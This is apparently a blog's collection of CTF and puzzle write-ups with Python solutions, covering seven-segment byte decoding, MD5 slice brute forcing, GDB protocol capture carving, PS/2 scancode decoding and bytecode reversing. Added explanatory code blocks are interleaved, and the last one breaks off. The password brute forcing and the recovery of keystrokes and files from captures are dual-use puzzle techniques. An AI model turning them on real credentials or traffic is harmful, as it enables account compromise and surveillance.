<output>bytes = [51, 91, 51, 31, 51, 71, 112, 31, 51, 123, 91, 71, 95, 127, 121, 51, 112, 95, 121, 121, 91, 71, 112, 126, 112, 112, 95, 79, 121, 121, 95, 51, 91, 71, 112, 123, 121, 126, 112, 91, 112, 109, 91, 71, 95, 51, 121, 48, 112, 121, 112, 126, 95, 78, 121, 51, 112, 123, 112, 61]
r = ''
table = {}
for b in bytes:
    if hex(b) not in table:
        letter = raw_input(hex(b) + '? ')
        table[hex(b)] = letter
    else:
        letter = table[hex(b)]
    r += letter
print r.decode('hex')</output>
# <code>python onthewire.py</code>
<output>0x33? 4
0x5b? 5
0x1f? b
0x47? f
0x70? 7
0x7b? 9
0x5f? 6
0x7f? 8
0x79? 3
0x7e? 0
0x4f? e
0x6d? 2
0x30? 1
0x4e? c
0x3d? d
EKO{I_h4v3_pwn3d_y0ur_d1spl4y}</output></pre><br />
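The script above asks a human which digit each byte draws. The same thing without the human, as an added example (Python 3) that is not the post's code: each byte is a set of lit segments, so map segment sets to hex digits and try the two usual wirings (segment a on the most significant bit, `abcdefg`, or on the least significant bit, `gfedcba`), keeping the one under which every byte is a valid glyph. The segment names a..g follow the usual clockwise convention starting at the top; SNIFFED is the byte list from the task.

```python
"""Seven-segment decoder for the sniffed bytes. Added example (Python 3), not
the post's script. Bit 7 would be the decimal point and is treated as invalid."""

# lit segments per hex digit (a=top, b=top-right, c=bottom-right, d=bottom,
# e=bottom-left, f=top-left, g=middle), with the upper-case C and the
# lower-case b and d that a 7-segment display has to use
SEGMENTS = {
    "0": "abcdef", "1": "bc", "2": "abdeg", "3": "abcdg", "4": "bcfg",
    "5": "acdfg", "6": "acdefg", "7": "abc", "8": "abcdefg", "9": "abcdfg",
    "a": "abcefg", "b": "cdefg", "c": "adef", "d": "bcdeg", "e": "adefg",
    "f": "aefg",
}
GLYPHS = {"".join(sorted(v)): k for k, v in SEGMENTS.items()}

SNIFFED = [51, 91, 51, 31, 51, 71, 112, 31, 51, 123, 91, 71, 95, 127, 121, 51,
           112, 95, 121, 121, 91, 71, 112, 126, 112, 112, 95, 79, 121, 121, 95,
           51, 91, 71, 112, 123, 121, 126, 112, 91, 112, 109, 91, 71, 95, 51,
           121, 48, 112, 121, 112, 126, 95, 78, 121, 51, 112, 123, 112, 61]

def lit_segments(value, order):
    """order[0] names the segment on bit 6, order[6] the one on bit 0."""
    return "".join(sorted(seg for i, seg in enumerate(order) if value >> (6 - i) & 1))

def decode(values, order):
    """One hex digit per byte, then the ASCII those digits spell; None if any
    byte is not a known glyph under this wiring."""
    digits = []
    for v in values:
        glyph = GLYPHS.get(lit_segments(v & 0x7f, order))
        if v > 0x7f or glyph is None:
            return None
        digits.append(glyph)
    return bytes.fromhex("".join(digits))

def decode_any(values):
    """Try both common bit orders; return (order, decoded) for the first that works."""
    for order in ("abcdefg", "gfedcba"):
        out = decode(values, order)
        if out is not None:
            return order, out
    return None, None

if __name__ == "__main__":
    print(decode_any(SNIFFED))
```

The wiring check is what replaces the guessing: with the wrong bit order the very first byte (0x33) lights segments a, b, e, f, which is no glyph at all, so that order is rejected before a single wrong character is emitted.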
<u>Reference</u><br />
<br />
https://en.wikichip.org/wiki/seven-segment_display/representing_lettersUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-41860198841915720172017-09-27T23:40:00.000+02:002017-09-27T23:40:58.369+02:00# GynvaelEN mission 015<br />
<pre># <code>cat mission_15.py</code>
<output>import hashlib
import itertools
import png
import numpy as np
r = png.Reader(file = open('leak.png'))
(width, height, iterator, info) = r.read()
# One character per pixel column: the number of pure-red pixels in a column
# is that character's ASCII code.
b = [0] * width
for row in iterator:
    row = row.tolist()
    for j in xrange(0, len(row), 3):
        value = row[j:j + 3]
        if value == [255, 0, 0]:
            b[j / 3] += 1
print ''.join([chr(c) for c in b])
hashes = [
    'e6d9fe6df8fd2a07ca6636729d4a615a',
    '273e97dc41693b152c71715d099a1049',
    'bd014fafb6f235929c73a6e9d5f1e458',
    'ab892a96d92d434432d23429483c0a39',
    'b56a807858d5948a4e4604c117a62c2d'
]
# The leaked PHP hashes every 5-character slice separately, so one pass over
# 54**5 (about 4.6e8) candidates recovers all five slices, instead of 54**25.
alphabet = ' !ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
password = [' '] * 5
counter = 0
for result in itertools.product(alphabet, repeat = 5):
    word = ''.join(list(result))
    m = hashlib.md5()
    m.update(word)
    hd = m.hexdigest()
    if hd in hashes:
        pos = hashes.index(hd)
        print pos, word
        password[pos] = word
        counter += 1
        if counter == 5: break
print ''.join(password)</output>
# <code>python mission_15.py</code>
<output><?php
if (!isset($_GET['password']) || !is_string($_GET['password'])) {
    die("bad password");
}
$p = $_GET['password'];
if (strlen($p) !== 25) {
    die("bad password");
}
if (md5($p) !== 'e66c97b8837d0328f3e5522ebb058f85') {
    die("bad password");
}
// Split the password in five and check the pieces.
// We need to be sure!
$values = array(
    0 => 'e6d9fe6df8fd2a07ca6636729d4a615a',
    5 => '273e97dc41693b152c71715d099a1049',
    10 => 'bd014fafb6f235929c73a6e9d5f1e458',
    15 => 'ab892a96d92d434432d23429483c0a39',
    20 => 'b56a807858d5948a4e4604c117a62c2d'
);
for ($i = 0; $i < 25; $i += 5) {
    if (md5(substr($p, $i, 5)) !== $values[$i]) {
        die("bad password");
    }
}
die("GW!");
2 are
0 Pie c
3 delic
1 harts
4 ious!
Pie charts are delicious!</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=BQRX3owv2JI (1:57:30)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-64053149057180420252017-08-15T22:29:00.000+02:002017-08-16T21:30:39.234+02:00# GynvaelEN mission 014<br />
<pre># <code>cat mission_14.py</code>
<output>w = 57
h = 25
directions = {
    'EAST': (1, 0),
    'NORTH': (0, -1),
    'WEST': (-1, 0),
    'SOUTH': (0, 1)
}
# smap[y][x] = '#'
smap = [[' ' for x in range(w)] for y in range(h)]
stack = []
x = 0
y = 9
log = open('log.txt').read().splitlines()
for line in log:
    if 'Trying' in line:
        d = directions[line.split()[1]]
    elif 'step' in line:
        stack.append((d[0], d[1]))
        x += d[0]
        y += d[1]
        smap[y][x] = '#'
    elif 'back' in line:
        d = stack.pop()
        x -= d[0]
        y -= d[1]
for i in smap: print ''.join(i)</output>
# <code>python mission_14.py</code>
<output>
# # ##### # ########## # # ### ## ####### ####### # #
# # # # # # # # # # # #### # # ## # #
### # # ########## #### # # # # # ### # ### # # #
# # # # # ########## # # # # # #
# ####### # # # #### ### # # # # # ########## #
# # # ###### # #### ## ##### ######### # #
### # # # ## # # ## #### # # # # # # ## ## ##
# # # # # ## # # ## ###### # # # # ###
####### ########### #### # # # # ######## ####
#
# ##################################################
#### ##################################################
# # #### ############ ############ ###### ###
## # #### ############ ########### ##### ## ##
# # ### ###### # ## ########### # ## ## ##
# ## ## ##### ### ## ### # ###### ##
# ## ## # ########### # ##### ###
#### ## #### #### ## ## ## #### ####
# ## ### # ##### ########### ## #####
#### ## ############ ################ ## ######
# ### ############ ################ ## ##
# # ##################################################
#######################################################
</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=rhsH-snYkIc (1:55:36)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-65198902628823885082017-08-12T21:35:00.000+02:002017-08-16T21:37:19.788+02:00# GynvaelEN mission 013<br />
<pre># <code>cat parser.py</code>
<output>import sys
def rld(d):
    # Undo GDB's run-length encoding: "c*N" is c repeated (ord(N) - 29) more
    # times, i.e. ord(N) - 28 copies once the original c is replaced.
    if '*' in d:
        i = d.index('*')
        c = d[i - 1]
        n = ord(d[i + 1]) - 28
        d = rld(d[:i - 1] + (c * n) + d[i + 2:])
    return d
def vfile(fd, files, line):
    # Track vFile:open / pread / close so every pread reply is written at the
    # right offset of the right host file (fd and files are updated in place;
    # data and i are the packet list and current index from the main loop).
    if 'vFile:open' in line:
        next_line = data[i + 1].split('#')[0]
        if 'F-1' not in next_line:
            name = line.split(':')[2].split(',')[0]
            num = next_line[1:]
            fd[num] = name
            if name not in files:
                files[name] = []
    elif 'vFile:close' in line:
        num = line.split(':')[2]
        fd[num] = ''
    elif 'vFile:pread' in line:
        num = line.split(':')[2].split(',')[0]
        offset = int('0x' + line.split(':')[2].split(',')[2], 16)
        next_line = data[i + 1].split('#')[0]
        d = rld(''.join(next_line.split(';')[1:]))
        name = fd[num]
        files[name].append({'offset': offset, 'data': d})
def memory(files, line, mem):
    # 'm<addr>,<len>' reads: keep the replies whose address starts with mem,
    # stored relative to that prefix
    if mem in line:
        offset = int('0x' + line.split(',')[0][1:].replace(mem, ''), 16)
        next_line = data[i + 1].split('#')[0]
        d = rld(next_line).decode('hex')
        files[mem].append({'offset': offset, 'data': d})
def write(files):
    for name in files:
        with open(name + '.bin', 'wb') as f:
            for reg in files[name]:
                f.seek(reg['offset'])
                f.write(reg['data'])
fd = {}
files = {}
fn = sys.argv[1]
with open(fn) as f:
    data = f.read().split('$')   # one RSP packet per element
action = sys.argv[2]
if action == 'memory':
    mem = sys.argv[3]
    files[mem] = []
i = 0
while i < len(data):
    line = data[i].split('#')[0]
    if action == 'vfile':
        vfile(fd, files, line)
    elif action == 'memory':
        memory(files, line, mem)
    i += 1
write(files)</output>
# <code>tshark -nr session.pcapng -T fields -e data -qz follow,tcp,raw,3 | tail -n +7 | tr -d '=\r\n\t' | xxd -r -p > follow_tcp_stream3</code>
# <code>python parser.py follow_tcp_stream3 vfile</code>
# <code>ls 2f*</code>
<output>2f6c69622f7838365f36342d6c696e75782d676e752f6c642d322e32342e736f.bin
2f6c696236342f6c642d6c696e75782d7838362d36342e736f2e32.bin
2f6d656469612f73665f425f44524956452f73747265616d2d6c697665636f64696e672f6d697373696f6e732f6d697373696f6e3031335f66696c65732f612e6f7574.bin
2f70726f632f353937392f6d617073.bin
2f70726f632f353937392f706572736f6e616c697479.bin
2f70726f632f353937392f7461736b2f353937392f6d617073.bin
2f70726f632f7379732f6b65726e656c2f72616e646f6d697a655f76615f7370616365.bin</output>
# <code>cat 2f70726f632f353937392f6d617073.bin</code>
<output><highlight>55555555</highlight>4000-555555555000 <highlight>r-xp</highlight> 00000000 00:2a 5868 /media/sf_B_DRIVE/stream-livecoding/missions/mission013_files/<highlight>a.out</highlight>
555555754000-555555756000 rw-p 00000000 00:2a 5868 /media/sf_B_DRIVE/stream-livecoding/missions/mission013_files/a.out
7ffff7dd7000-7ffff7dfc000 r-xp 00000000 08:01 14942250 /lib/x86_64-linux-gnu/ld-2.24.so
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffe000 rw-p 00025000 08:01 14942250 /lib/x86_64-linux-gnu/ld-2.24.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</output>
# <code>python parser.py follow_tcp_stream3 memory 55555555</code>
# <code>r2 55555555.bin</code>
[0x00000000]> <code>s 0x00004831</code>
[0x00004831]> <code>pd 44</code>
<output> 0x00004831 48c785a8feff. mov qword [rbp - 0x158], 0
.-> 0x0000483c 488b85a8feff. mov rax, qword [rbp - 0x158]
| 0x00004843 483b85b8feff. cmp rax, qword [rbp - 0x148]
,==< 0x0000484a 0f83b9000000 jae 0x4909
|| 0x00004850 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004857 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x0000485e 4801d0 add rax, rdx ; '('
|| 0x00004861 0fb600 movzx eax, byte [rax]
|| 0x00004864 83f05a xor eax, 0x5a
|| 0x00004867 89c1 mov ecx, eax
|| 0x00004869 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004870 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x00004877 4801d0 add rax, rdx ; '('
|| 0x0000487a 8808 mov byte [rax], cl
|| 0x0000487c 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x00004883 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x0000488a 4801d0 add rax, rdx ; '('
|| 0x0000488d 0fb600 movzx eax, byte [rax]
|| 0x00004890 8d5063 lea edx, dword [rax + 0x63] ; 0x63 ; 'c'
|| 0x00004893 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x0000489a 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048a1 4801c8 add rax, rcx ; '&'
|| 0x000048a4 8810 mov byte [rax], dl
|| 0x000048a6 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048ad 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048b4 4801d0 add rax, rdx ; '('
|| 0x000048b7 0fb600 movzx eax, byte [rax]
|| 0x000048ba 83f05a xor eax, 0x5a
|| 0x000048bd 89c1 mov ecx, eax
|| 0x000048bf 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048c6 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048cd 4801d0 add rax, rdx ; '('
|| 0x000048d0 8808 mov byte [rax], cl
|| 0x000048d2 488d95f0feff. lea rdx, qword [rbp - 0x110]
|| 0x000048d9 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048e0 4801d0 add rax, rdx ; '('
|| 0x000048e3 0fb600 movzx eax, byte [rax]
|| 0x000048e6 8d5063 lea edx, dword [rax + 0x63] ; 0x63 ; 'c'
|| 0x000048e9 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x000048f0 488b85a8feff. mov rax, qword [rbp - 0x158]
|| 0x000048f7 4801c8 add rax, rcx ; '&'
|| 0x000048fa 8810 mov byte [rax], dl
|| 0x000048fc 488385a8feff. add qword [rbp - 0x158], 1
|`=< 0x00004904 e933ffffff jmp 0x483c</output>
[0x00004831]> <code>s 0x4909</code>
[0x00004909]> <code>pd 58</code>
<output> 0x00004909 c685c0feffff. mov byte [rbp - 0x140], 0x8e
0x00004910 c685c1feffff. mov byte [rbp - 0x13f], 0x32 ; '2'
0x00004917 c685c2feffff. mov byte [rbp - 0x13e], 0x2f ; '/'
0x0000491e c685c3feffff. mov byte [rbp - 0x13d], 0x39 ; '9'
0x00004925 c685c4feffff. mov byte [rbp - 0x13c], 0xea
0x0000492c c685c5feffff. mov byte [rbp - 0x13b], 0x2d ; '-'
0x00004933 c685c6feffff. mov byte [rbp - 0x13a], 0x27 ; '''
0x0000493a c685c7feffff. mov byte [rbp - 0x139], 0x39 ; '9'
0x00004941 c685c8feffff. mov byte [rbp - 0x138], 0xea
0x00004948 c685c9feffff. mov byte [rbp - 0x137], 0x27 ; '''
0x0000494f c685cafeffff. mov byte [rbp - 0x136], 0xea
0x00004956 c685cbfeffff. mov byte [rbp - 0x135], 0x88
0x0000495d c685ccfeffff. mov byte [rbp - 0x134], 0x25 ; '%'
0x00004964 c685cdfeffff. mov byte [rbp - 0x133], 0x94
0x0000496b c685cefeffff. mov byte [rbp - 0x132], 0x3b ; ';'
0x00004972 c685cffeffff. mov byte [rbp - 0x131], 0x30 ; '0'
0x00004979 c685d0feffff. mov byte [rbp - 0x130], 0x39 ; '9'
0x00004980 c685d1feffff. mov byte [rbp - 0x12f], 0x2f ; '/'
0x00004987 c685d2feffff. mov byte [rbp - 0x12e], 0x29 ; ')'
0x0000498e c685d3feffff. mov byte [rbp - 0x12d], 0x39 ; '9'
0x00004995 c685d4feffff. mov byte [rbp - 0x12c], 0xea
0x0000499c c685d5feffff. mov byte [rbp - 0x12b], 0x2e ; '.'
0x000049a3 c685d6feffff. mov byte [rbp - 0x12a], 0x27 ; '''
0x000049aa c685d7feffff. mov byte [rbp - 0x129], 0x39 ; '9'
0x000049b1 c685d8feffff. mov byte [rbp - 0x128], 0x31 ; '1'
0x000049b8 c685d9feffff. mov byte [rbp - 0x127], 0xea
0x000049bf c685dafeffff. mov byte [rbp - 0x126], 0x8f
0x000049c6 c685dbfeffff. mov byte [rbp - 0x125], 0xea
0x000049cd c685dcfeffff. mov byte [rbp - 0x124], 0x5d ; ']'
0x000049d4 c685ddfeffff. mov byte [rbp - 0x123], 0x2b ; '+'
0x000049db c685defeffff. mov byte [rbp - 0x122], 0x5b ; '['
0x000049e2 c685dffeffff. mov byte [rbp - 0x121], 0x39 ; '9'
0x000049e9 c685e0feffff. mov byte [rbp - 0x120], 0x39 ; '9'
0x000049f0 c685e1feffff. mov byte [rbp - 0x11f], 0xf0
0x000049f7 48c785b0feff. mov qword [rbp - 0x150], 0
.-> 0x00004a02 488b85b0feff. mov rax, qword [rbp - 0x150]
| 0x00004a09 483b85b8feff. cmp rax, qword [rbp - 0x148]
,==< 0x00004a10 7349 jae 0x4a5b
|| 0x00004a12 488d95c0feff. lea rdx, qword [rbp - 0x140]
|| 0x00004a19 488b85b0feff. mov rax, qword [rbp - 0x150]
|| 0x00004a20 4801d0 add rax, rdx ; '('
|| 0x00004a23 0fb610 movzx edx, byte [rax]
|| 0x00004a26 488d8df0feff. lea rcx, qword [rbp - 0x110]
|| 0x00004a2d 488b85b0feff. mov rax, qword [rbp - 0x150]
|| 0x00004a34 4801c8 add rax, rcx ; '&'
|| 0x00004a37 0fb600 movzx eax, byte [rax]
|| 0x00004a3a 38c2 cmp dl, al
,===< 0x00004a3c 7413 je 0x4a51
||| 0x00004a3e 488d3dd80000. lea rdi, qword 0x00004b1d ; 0x4b1d
||| 0x00004a45 e8e6fbffff call 0x4630
||| 0x00004a4a b803000000 mov eax, 3
,====< 0x00004a4f eb1b jmp 0x4a6c
|`---> 0x00004a51 488385b0feff. add qword [rbp - 0x150], 1
| |`=< 0x00004a59 eba7 jmp 0x4a02
| `--> 0x00004a5b 488d3dc00000. lea rdi, qword 0x00004b22 ; 0x4b22
| 0x00004a62 e8c9fbffff call 0x4630
| 0x00004a67 b800000000 mov eax, 0
`----> 0x00004a6c 488b75f8 mov rsi, qword [rbp - 8]</output>
# <code>ipython</code>
In [1]: <code>table = [0x8e, 0x32, 0x2f, 0x39, 0xea, 0x2d, 0x27, 0x39, 0xea, 0x27, 0xea, 0x88, 0x25, 0x94, 0x3b, 0x30, 0x39, 0x2f, 0x29, 0x39, 0xea, 0x2e, 0x27, 0x39, 0x31, 0xea, 0x8f, 0xea, 0x5d, 0x2b, 0x5b, 0x39, 0x39, 0xf0]</code>
...: <code>r = ''</code>
...: <code>for e in table:</code>
...: <code>r += chr(((((e - 0x63) ^ 0x5a) - 0x63) ^ 0x5a) & 0xff)</code>
...: <code>print r</code>
...:
<output>This was a FoREnsics task I guess.</output></pre><br />
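parser.py splits the stream on `$` and `#` and trusts what it finds; the framing it skips over is small enough to do properly. The following is an added example (Python 3), not the post's code: RSP packet framing with checksum verification, the run-length decoding that `rld` does, and the `}` escaping that binary attachments such as `vFile:pread` replies use. The packets in the usage and test are constructed, not taken from session.pcapng.

```python
"""GDB remote serial protocol (RSP) framing. Added example (Python 3), not the
post's code: $payload#cs framing, run-length decoding, binary unescaping and
a vFile:pread reply parser built on them."""

def checksum(payload: bytes) -> int:
    return sum(payload) % 256

def frame(payload: bytes) -> bytes:
    """$payload#cs, as sent by the gdb client or the stub."""
    return b"$" + payload + b"#%02x" % checksum(payload)

def unframe(packet: bytes) -> bytes:
    """Strip a leading ack ('+'/'-') and the $...#cs wrapper, verifying cs."""
    packet = packet.lstrip(b"+-")
    if not (packet.startswith(b"$") and packet[-3:-2] == b"#"):
        raise ValueError("not a $...#xx frame")
    payload, cs = packet[1:-3], int(packet[-2:], 16)
    if checksum(payload) != cs:
        raise ValueError("checksum mismatch")
    return payload

def rle_decode(data: bytes) -> bytes:
    """'c*N' = c followed by (ord(N) - 29) more copies of c."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == ord("*") and out:
            out.extend(bytes([out[-1]]) * (data[i + 1] - 29))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)

def unescape_binary(data: bytes) -> bytes:
    """'}' escapes the next byte (sent XORed with 0x20) so that '$', '#', '*'
    and '}' never appear raw inside a binary attachment."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == ord("}"):
            out.append(data[i + 1] ^ 0x20)
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)

def parse_vfile_pread_reply(packet: bytes) -> bytes:
    """'F<hexlen>;<escaped bytes>' -> the bytes read; 'F-1,<errno>' raises OSError."""
    payload = rle_decode(unframe(packet))
    if not payload.startswith(b"F"):
        raise ValueError("not an F reply")
    head, _, body = payload.partition(b";")
    if head.startswith(b"F-"):
        raise OSError("vFile error, errno " + head.split(b",")[1].decode())
    data = unescape_binary(body)
    if len(data) != int(head[1:], 16):
        raise ValueError("length mismatch")
    return data

if __name__ == "__main__":
    # constructed exchange: open /etc/passwd (hex-encoded path), read 8 bytes
    print(frame(b"vFile:open:2f6574632f706173737764,0,0"))
    reply = frame(b"F8;\x7fELF}\x04}\x0a\x02\x01")
    print(parse_vfile_pread_reply(reply))
```

The checksum is what tells a truncated or reassembled-wrong TCP segment apart from a real packet when you carve files out of a capture; a wrong `*` count or a missed `}` escape otherwise silently shifts every later offset of the reconstructed file.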
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=7zTtVYjjquA (1:58:10)<br />
<br />
<u>Reference</u><br />
<br />
https://sourceware.org/gdb/onlinedocs/gdb/Remote-Protocol.htmlUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-89156726972683978062017-08-04T23:37:00.000+02:002017-08-16T21:30:51.405+02:00# GynvaelEN mission 012<br />
<pre># <code>curl -s http://www.computer-engineering.org/ps2keyboard/scancodes2.html | tr [:upper:] [:lower:] > scan_codes.html</code>
# <code>for i in 12 1b 1c 23 24 29 2c 2d 31 32 35 41 42 43 44 49 4d 52 58 59; do result=`cat scan_codes.html | grep '<tt>' | grep -m1 -B1 "<tt>$i</tt>" | sed 's/<[^>]*>//g' | tr -d ' '| tr -d '\r'`; key=`echo "$result" | tail -n1`; value=`echo "$result" | head -n1`; echo "0x$key: '$value',"; done</code>
<output>0x12: 'lshft',
0x1b: 's',
0x1c: 'a',
0x23: 'd',
0x24: 'e',
0x29: 'space',
0x2c: 't',
0x2d: 'r',
0x31: 'n',
0x32: 'b',
0x35: 'y',
0x41: ',',
0x42: 'k',
0x43: 'i',
0x44: 'o',
0x49: '.',
0x4d: 'p',
0x52: ''',
0x58: 'caps',
0x59: 'rshft'
</output>
# <code>cat keylogger.py</code>
<output>'''
<highlight>0x58</highlight> 0xf0 <highlight>0x58</highlight>
0x1b 0xf0 0x1b
<highlight>0x58</highlight> 0xf0 <highlight>0x58</highlight>
0x44 0xf0 0x44
0x2d 0xf0 0x2d
0x2d 0xf0 0x2d
0x35 0xf0 0x35
0x41 0xf0 0x41
0x29 0xf0 0x29
<highlight>0x59</highlight> 0x43 0xf0 0x43 0xf0 <highlight>0x59</highlight>
0x29 0xf0 0x29
0x23 0xf0 0x23
0x44 0xf0 0x44
0x31 0xf0 0x31
0x52 0xf0 0x52
0x2c 0xf0 0x2c
0x29 0xf0 0x29
0x1b 0xf0 0x1b
0x4d 0xf0 0x4d
0x24 0xf0 0x24
0x1c 0xf0 0x1c
0x42 0xf0 0x42
0x29 0xf0 0x29
<highlight>0x12</highlight> 0x42 0xf0 0x42 0xf0 <highlight>0x12</highlight>
0x24 0xf0 0x24
0x35 0xf0 0x35
0x32 0xf0 0x32
0x44 0xf0 0x44
0x1c 0xf0 0x1c
0x2d 0xf0 0x2d
0x23 0xf0 0x23
0x49 0xf0 0x49
'''
# Scan Codes
sc = {
0x12: 'lshft',
0x1b: 's',
0x1c: 'a',
0x23: 'd',
0x24: 'e',
0x29: ' ',
0x2c: 't',
0x2d: 'r',
0x31: 'n',
0x32: 'b',
0x35: 'y',
0x41: ',',
0x42: 'k',
0x43: 'i',
0x44: 'o',
0x49: '.',
0x4d: 'p',
0x52: '\'',
0x58: 'caps',
0x59: 'rshft'
}
data = [0x58, 0xf0, 0x58, 0x1b, 0xf0, 0x1b, 0x58, 0xf0, 0x58, 0x44, 0xf0, 0x44, 0x2d, 0xf0, 0x2d, 0x2d, 0xf0, 0x2d, 0x35, 0xf0, 0x35, 0x41, 0xf0, 0x41, 0x29, 0xf0, 0x29, 0x59, 0x43, 0xf0, 0x43, 0xf0, 0x59, 0x29, 0xf0, 0x29, 0x23, 0xf0, 0x23, 0x44, 0xf0, 0x44, 0x31, 0xf0, 0x31, 0x52, 0xf0, 0x52, 0x2c, 0xf0, 0x2c, 0x29, 0xf0, 0x29, 0x1b, 0xf0, 0x1b, 0x4d, 0xf0, 0x4d, 0x24, 0xf0, 0x24, 0x1c, 0xf0, 0x1c, 0x42, 0xf0, 0x42, 0x29, 0xf0, 0x29, 0x12, 0x42, 0xf0, 0x42, 0xf0, 0x12, 0x24, 0xf0, 0x24, 0x35, 0xf0, 0x35, 0x32, 0xf0, 0x32, 0x44, 0xf0, 0x44, 0x1c, 0xf0, 0x1c, 0x2d, 0xf0, 0x2d, 0x23, 0xf0, 0x23, 0x49, 0xf0, 0x49]
may = False
shift = False
stack = []
decoded = ''
for i in data:
    #print i
    if i != 240:  # 0xf0 is the break prefix: the code that follows it is a key release
        letter = sc[i]
        #print letter, stack
        if letter in stack:
            stack.remove(letter)
        else:
            stack.append(letter)
            if letter == 'caps': may = not may
            elif 'shft' in letter: shift = True
            else:
                if may:
                    decoded += letter.upper()
                elif shift:
                    decoded += letter.upper()
                    shift = False
                else:
                    decoded += letter
print decoded</output>
# <code>python keylogger.py</code>
<output>Sorry, I don't speak Keyboard.</output></pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=4Xo_FAx6P0A (1:51:20)<br />
<br />
<u>Done in collaboration</u><br />
<br />
https://atorralba.github.io/<br />
<br />
# GynvaelEN mission 011 (2017-08-03)<br />
<pre># <code>cat mission_11-firmware.txt</code>
<output># Number of arguments this code object expects
co_argcount 1
# Tuple of constant objects
co_consts (None, '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89', 'hex', 89, 255, 115, 50)
# Flags
co_flags 67
# Function name
co_name check_password
# Names used
co_names ('decode', 'len', 'False', 'all', 'zip', 'ord')
# Number of local variables
co_nlocals 4
# The depth of the stack
co_stacksize 6
# Argument names
co_varnames ('s', 'good', 'cs', 'cg')
0 LOAD_CONST 1 stack[0] = '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89'
3 LOAD_ATTR 0 names[0] # decode
6 LOAD_CONST 2 stack[1] = 'hex'
9 CALL_FUNCTION 1 stack[0] = 'N]N\x92\x86ZNIZ\x86IKZ]IRRa\x86_WXSMJ\x89' # 26
12 STORE_FAST 1 good = 'N]N\x92\x86ZNIZ\x86IKZ]IRRa\x86_WXSMJ\x89' # 26; stack is empty
15 LOAD_GLOBAL 1 stack[0] = 'len'
18 LOAD_FAST 0 stack[1] = 's'
21 CALL_FUNCTION 1 ?; stack is empty
24 LOAD_GLOBAL 1 stack[0] = 'len'
27 LOAD_FAST 1 stack[1] = 'good'
30 CALL_FUNCTION 1 26; stack is empty
33 COMPARE_OP 3 (!=) len(s) != len(good)
36 POP_JUMP_IF_FALSE 43 if eq goto 43
39 LOAD_GLOBAL 2 else stack[0] = 'False'
42 RETURN_VALUE return 'False'
>> 43 LOAD_GLOBAL 3 stack[0] = 'all'
46 BUILD_LIST 0 stack[0] = ['all']
49 LOAD_GLOBAL 4 stack[1] = 'zip'
52 LOAD_FAST 0 stack[2] = 's'
55 LOAD_FAST 1 stack[3] = 'good'
58 CALL_FUNCTION 2 stack[0] = zip(s, good)
61 GET_ITER stack[0] = iter(zip(s, good))
>> 62 FOR_ITER 52 (to 117)
65 UNPACK_SEQUENCE 2 stack[1] = s[i], good[i]
68 STORE_FAST 2 cs = s[i]
71 STORE_FAST 3 cg = good[i]
74 LOAD_GLOBAL 5 stack[0] = 'ord'
77 LOAD_FAST 2 stack[1] = cs
80 CALL_FUNCTION 1 stack[0] = ord(cs)
83 LOAD_CONST 3 stack[1] = 89
86 BINARY_SUBTRACT stack[0] = ord(cs) - 89
87 LOAD_CONST 4 stack[1] = 255
90 BINARY_AND stack[0] = (ord(cs) - 89) & 255
91 LOAD_CONST 5 stack[1] = 115
94 BINARY_XOR stack[0] = ((ord(cs) - 89) & 255) ^ 115
95 LOAD_CONST 6 stack[1] = 50
98 BINARY_XOR stack[0] = (((ord(cs) - 89) & 255) ^ 115) ^ 50
99 LOAD_GLOBAL 5 stack[1] = 'ord'
102 LOAD_FAST 3 stack[2] = cg
105 CALL_FUNCTION 1 stack[1] = ord(cg)
108 COMPARE_OP 2 (==) computed_cg == cg
111 LIST_APPEND 2
114 JUMP_ABSOLUTE 62 goto 62
>> 117 CALL_FUNCTION 1
120 RETURN_VALUE</output>
# <code>cat mission_11.py</code>
<output>password = ''
for i in '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89'.decode('hex'):
    password += chr(255 & (89 + (ord(i) ^ 50 ^ 115)))
print password</output>
# <code>python mission_11.py</code>
<output>huh, that actually worked!</output></pre><br />
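As an added check (Python 3, my own code and not part of the original post): transcribe check_password from the disassembly above, invert it the way mission_11.py does, and confirm the checker accepts the recovered string. The only input is the co_consts[1] string from the dump.

```python
# Added example (Python 3); not from the original post.  GOOD_HEX is the
# co_consts[1] string from the dump above; everything else is a transcription
# of the bytecode, not the mission's own code.
GOOD_HEX = '4e5d4e92865a4e495a86494b5a5d49525261865f5758534d4a89'


def check_password(s):
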